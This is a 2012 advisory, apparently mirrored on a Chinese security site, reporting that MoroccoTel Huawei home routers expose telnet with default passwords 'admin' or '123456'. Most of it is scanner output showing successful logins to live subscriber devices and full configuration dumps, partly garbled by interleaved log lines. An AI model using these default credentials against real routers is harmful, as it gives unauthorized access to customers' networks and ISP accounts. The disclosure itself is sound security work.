首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MoroccoTel Box Default Open Telnet Password
来源:www.netpeas.com 作者:Athias 发布时间:2012-04-27  
a "vulnerability" was identified on MoroccoTel Boxes:
a telnet server is running, open to the web, with a default password of
admin (or 123456)

This critical vulnerability can affect the entire network of a Country.

Solution: change the default password account or modify the default firmware

NB: a new firmware was released, introducing a cipher on the "PPOE
password" (one common, publicly available PPOE account is largely used)

Discovered by NETpeas research team, NETpeas CERT is trying to contact
the ISP

More details:

Password:
telnettry
41.141.*.* -> Response telnet02: ****
Copyright (c) 2001 - 2006 Huawei
MT882a>
***********************************************************
41.141.*.* -> TELNET PASSWORD FOUND: admin

MT882a> show all

RAS version: V100R001B022 MoroccoTel 2010/02/26
System   ID: $5.0.152.1(RUE0.C2)3.11.2.151 20110602_V001  [Jun 02 2011
13:54:48]
romRasSize: 1217226
system up time:     2:45:45 (f2cc9 ticks)
bootbase version: VTC_SPI1.5| 2011/05/26


Hostname        = MT882a
Message         = <empty>
ip route mode   = Yes
bridge mode     = Yes
DHCP setting:
  DHCP Mode      = Server
  Client IP Pool Starting Address = 192.168.1.2
  Size of Client IP Pool = 64
  Primary DNS Server     = 8.8.8.8
  Secondary DNS Server   = 8.8.4.4
  DHCP server leasetime  = 86400
TCP/IP Setup:
  IP Address     = 192.168.1.1
  IP Subnet Mask = 255.255.255.0
  Rip Direction  = None
    Version      = Rip-1
  Multicast      = IGMP-v2


RemoteNode     = 0
Rem Node Name  = ISP-0(ISP)
Encapsulation  = PPPoE
Multiplexing   = LLC-based
Channel active = Yes
VPI/VCI value  = 8/35
IP Routing mode= Yes
Bridge mode    = No
PPP Username   = <snip>
 
PPP Password
41.141.*.* ->    = *******
PPP Username_ext2   =
PPP Password_ext2   =
Service name   =
Remote IP Addr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA            = Yes
Multicast      = None
Default Route node            = Yes

RemoteNode     = 1
Rem Node Name  = ISP-1
Encapsulation  = RFC 1483
Multiplexing   = LLC-based
Channel
41.141.1.9 -> Port 80 open
41.141.*.* -> active = Yes
VPI/VCI value  = 0/35
IP Routing mode= No
Bridge mode    = Yes
Remote IP Addr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0

41.141.*.* -> IP address assignment type = Dynamic

41.141.*.* -> SUA            = No
Multicast      = None
Default Route node            = No

RemoteNode     = 2
Rem Node Name  = ISP-2
Encapsulation  = RFC 1483
Multiplexing   = LLC-based
Channel active = Yes
VPI/VCI value  = 0/32
IP Routing mode= No
Bridge mode    = Yes
Remote IP Addr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA            = No
Multicast      = None
Default Route node            = No

RemoteNode     = 3
Rem Node Name  = ISP-3
Encapsulation  = RFC 1483
Multiplexing   = LLC-based
Channel active = Yes
VPI/VCI value  = 8/32
IP Routing mode= No
Bridge mode    = Yes
Remote IP Addr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA            = No
Multicast      = None
Default Route node            = No

RemoteNode     = 4
Rem Node Name  = ISP-4
Encapsulation  = RFC 1483
Multiplexing   = LLC-based
Channel active = Yes
VPI/VCI value  = 8/81
IP Routing mode= No
Bridge mode    = Yes
Remote IP
41.141.*.* ->  Addr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA            = No
Multicast      = None
Default Route node            = No

RemoteNode     = 5
Rem Node Name  = ISP-5
Encapsulation  = RFC 1483
Multiplexing   = LLC-based
Channel active = Yes
VPI/VCI value  = 0/100
IP Routing mode= No
Bridge mode    = Yes
Remote IP A
41.141.*.* -> ddr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA            = No
sMulticast      = None

41.141.*.* -> yDefault Route node            = No
s
RemoteNode     = 6
aRem Node Name  = ISP-6t
sEncapsulation  = hRFC 1483

Multiplexing   = LLC-based
Channel active = Yes
VPI/VCI value  = 1/39
IP Routing mode= No
Bridge mode    = Yes
Remote IP Addr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA            = No
Multicast      = None
Default Route node            = No

RemoteNode     = 7
Rem Node Name  = ISP-7
Encapsulation  = RFC 1483
Multiplexing   = LLC-based
Channel active = Yes
VPI/VCI value  = 0/16
IP Routing mode= No
Bridge mode    = Yes
Remote IP Addr        = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA            = No
Multicast      = None
Default Route node            = No

MT882a>
RAS version            : V100R001B022 MoroccoTel
romRasSize             : 1217226
bootbase version       : VTC_SPI1.5| 2011/05/26
Product Model          : SmartAX

MAC Address            : <snip-inclear>

Default Count
41.141.*.* -> ry Code   : FF

Boot Module Debug Flag : 00

RomFile Version        : 9F

RomFile Checksum       : dceb

RAS F/W Checksum       : 87b7

SNMP MIB level & OID   : 050000000100000002000000030000000400000005

Main Feature Bits      : 86

Other Feature Bits     :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 13 00 00 00
MT882a>
41.141.*.* -> e
41.141.*.* -> ther config
--------------- NDIS CONFIGURATION BLOCK ----------------
type=1 flags=0001
Board/Chassis:1  Lines/Board:1  Channels/Lines:2 Total Channel:2
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
board-pp (8042c8f0)
804273fc
line-pp (8042c8f4)
8042956c
chann-pp (8042c8f8)
804bf8a4 804bfe34
--------------- BOARD DISPLAY ---------------------------
ID  slot#  n-line  n-chann  status  line-cfg  chann-cfg
00      0       1        2    0001  8042c8bc    8042c8d0
--------------- LINE  DISPLAY ---------------------------
ID  line#  board-id  n-chann  chann-cfg
00      1  00              2  8042c8d0
--------------- CHANNEL DISPLAY -------------------------
ID  chan#  line-id  board-id  address name
00      1  00       00        804bf8a4  enet0
01      2  00       00        804bfe34  enet1
MT882a>


--
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
Mobile: +212665346454
www.netpeas.com

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·mount.cifs chdir() Arbitrary r
·Parallels PLESK 9.x Insecure P
·Discuz! X2.5 远程代码执行漏洞
·Shadow Stream Recorder 3.0.1.7
·CPE17 Autorun Killer <= 1.7.1
·MS12-027 MSCOMCTL ActiveX Buff
·Nokia PC Suite Video Manager 7
·杰奇JIEQIcms <=1.6 Administrat
·Mikrotik's Winbox Remote Code
·RuggedCom Devices Backdoor Acc
·WebCalendar 1.2.4 Pre-Auth Rem
·.NET Framework EncoderParamete
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved